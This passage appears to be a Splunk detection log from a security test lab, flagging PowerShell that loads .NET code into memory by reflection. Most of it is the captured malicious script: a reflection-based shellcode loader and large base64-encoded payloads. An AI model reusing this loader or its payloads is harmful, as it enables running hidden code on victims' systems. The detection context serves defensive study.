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 to load .net code in memory with EventCode 4104 in host exchange01.attackrange.local", risk_object="'S-1-5-18'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664805332, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="exchange01.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="Set-StrictMode -Version 2 $DoIt = @' function func_get_proc_address { Param ($var_module, $var_procedure) $var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods') $var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string')) return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure)) } function func_get_delegate_type { Param ( [Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters, [Parameter(Position = 1)] [Type] $var_return_type = [Void] ) $var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate]) $var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed') $var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed') return $var_type_builder.CreateType() } [Byte[]]$var_code = [System.Convert]::FromBase64String('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